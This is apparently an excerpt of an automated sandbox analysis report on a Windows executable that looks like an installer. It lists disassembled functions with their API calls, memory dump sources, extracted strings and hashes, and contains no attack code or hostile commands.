                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseDirectoryHandleSystem
                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                            • API String ID: 2051275411-1862435767
                                                            • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                            • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                            • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                            • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: <T@
                                                            • API String ID: 3320372497-2050694182
                                                            • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                            • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                            • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCapture.USER32 ref: 005B83B6
                                                            • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                            • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                            • String ID:
                                                            • API String ID: 1994056952-0
                                                            • Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                            • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                            • Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                            • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                            • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                            • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                            • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessagePostWindow$ForegroundProc
                                                            • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                            • API String ID: 602442252-4088602279
                                                            • Opcode ID: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                            • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                            • Opcode Fuzzy Hash: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                            • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                            • API String ID: 390214022-3304407042
                                                            • Opcode ID: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                            • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                            • Opcode Fuzzy Hash: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                            • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                            • GetTickCount.KERNEL32 ref: 00408E4F
                                                            • GetTickCount.KERNEL32 ref: 00408E67
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                            • GetTickCount.KERNEL32 ref: 00408EC1
                                                            • GetTickCount.KERNEL32 ref: 00408EF8
                                                            • GetTickCount.KERNEL32 ref: 00408F22
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                            • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32 ref: 005B8604
                                                            • IsWindowUnicode.USER32 ref: 005B8618
                                                            • PeekMessageW.USER32 ref: 005B863B
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                            • TranslateMessage.USER32 ref: 005B86D6
                                                            • DispatchMessageW.USER32 ref: 005B86E3
                                                            • DispatchMessageA.USER32 ref: 005B86EB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                            • String ID:
                                                            • API String ID: 2190272339-0
                                                            • Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                            • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                            • Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                            • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 005C92F7
                                                            • GetFocus.USER32 ref: 005C92FF
                                                            • RegisterClassW.USER32 ref: 005C9320
                                                            • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                            • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FocusWindow$ActiveClassRegisterShow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 495420250-1824977358
                                                            • Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                            • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                            • Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                            • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                            • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                            • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandle$AttributesCloseCreateModule
                                                            • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                            • API String ID: 791737717-340263132
                                                            • Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                            • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                            • Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                            • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                            • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                            • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                            • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
